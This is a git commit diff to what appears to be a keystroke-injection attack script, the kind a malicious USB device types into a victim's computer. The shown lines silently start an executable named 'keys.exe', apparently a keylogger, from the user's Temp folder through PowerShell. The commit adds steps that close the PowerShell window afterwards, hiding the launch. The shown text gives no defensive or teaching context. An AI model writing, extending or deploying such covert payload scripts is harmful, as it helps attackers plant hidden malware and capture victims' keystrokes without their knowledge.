🐛 Closes powershell after script starts

This commit is contained in:
Daniel Svitan 2025-03-25 21:03:23 +01:00
parent 2abef32841
commit 647ece6a43

View File

@ -13,3 +13,7 @@ RUN client.exe file
STRING Start-Process -FilePath .\AppData\Local\Temp\keys.exe -NoNewWindow
ENTER
DELAY 1000
RUN close powershell
STRING exit
ENTER